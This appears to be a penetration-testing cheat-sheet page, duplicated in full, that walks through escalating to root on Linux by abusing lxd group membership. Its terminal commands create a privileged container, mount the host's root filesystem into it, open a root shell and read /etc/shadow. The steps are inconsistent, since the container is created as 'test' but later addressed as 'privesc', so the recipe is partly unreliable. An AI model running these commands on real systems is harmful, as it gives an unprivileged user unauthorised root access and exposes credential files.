LXD group - N/A

Privilege escalation using lxd group

test@server-01:~$ id
uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)

# Init lxd to create "root device"
test@server-01:/dev/shm$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: n
Do you want to configure a new storage pool? (yes/no) [default=yes]: y
Name of the new storage pool [default=default]: 
Name of the storage backend to use (zfs, ceph, btrfs, dir, lvm) [default=zfs]: 
Create a new ZFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=19GB]: 1
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: no
Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]: no
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

# Create image
test@server-01:/dev/shm$ lxc init ubuntu:16.04 test -c security.privileged=true
Creating test
test@server-01:/dev/shm$ lxc image list
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+
| ALIAS | FINGERPRINT  | PUBLIC |                 DESCRIPTION                 | ARCHITECTURE |   TYPE    |   SIZE   |         UPLOAD DATE          |
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+
|       | 712a58368655 | no     | ubuntu 16.04 LTS amd64 (release) (20211001) | x86_64       | CONTAINER | 171.55MB | Apr 28, 2022 at 7:19am (UTC) |
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+

# Mount system root (/) to container
test@server-01:/dev/shm$ lxc config device add privesc whatever disk source=/ path=/mnt/root recursive=true
Device whatever added to privesc

# Start container and reap the rewards
test@server-01:/dev/shm$ lxc start privesc
test@server-01:/dev/shm$ lxc exec privesc bash
root@privesc:~# cd /mnt/root/
root@test:/mnt/root# cat etc/shadow
root:*:18913:0:99999:7:::

# Clean up
test@server-01:/dev/shm$ lxc stop privesc --force
test@server-01:/dev/shm$ lxc delete privesc
test@server-01:/dev/shm$ lxc image delete 712a58368655

Last updated 10 months ago

Was this helpful?

Privilege escalation using lxd group

test@server-01:~$ id
uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)

# Init lxd to create "root device"
test@server-01:/dev/shm$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: n
Do you want to configure a new storage pool? (yes/no) [default=yes]: y
Name of the new storage pool [default=default]: 
Name of the storage backend to use (zfs, ceph, btrfs, dir, lvm) [default=zfs]: 
Create a new ZFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=19GB]: 1
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: no
Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]: no
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

# Create image
test@server-01:/dev/shm$ lxc init ubuntu:16.04 test -c security.privileged=true
Creating test
test@server-01:/dev/shm$ lxc image list
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+
| ALIAS | FINGERPRINT  | PUBLIC |                 DESCRIPTION                 | ARCHITECTURE |   TYPE    |   SIZE   |         UPLOAD DATE          |
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+
|       | 712a58368655 | no     | ubuntu 16.04 LTS amd64 (release) (20211001) | x86_64       | CONTAINER | 171.55MB | Apr 28, 2022 at 7:19am (UTC) |
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+

# Mount system root (/) to container
test@server-01:/dev/shm$ lxc config device add privesc whatever disk source=/ path=/mnt/root recursive=true
Device whatever added to privesc

# Start container and reap the rewards
test@server-01:/dev/shm$ lxc start privesc
test@server-01:/dev/shm$ lxc exec privesc bash
root@privesc:~# cd /mnt/root/
root@test:/mnt/root# cat etc/shadow
root:*:18913:0:99999:7:::

# Clean up
test@server-01:/dev/shm$ lxc stop privesc --force
test@server-01:/dev/shm$ lxc delete privesc
test@server-01:/dev/shm$ lxc image delete 712a58368655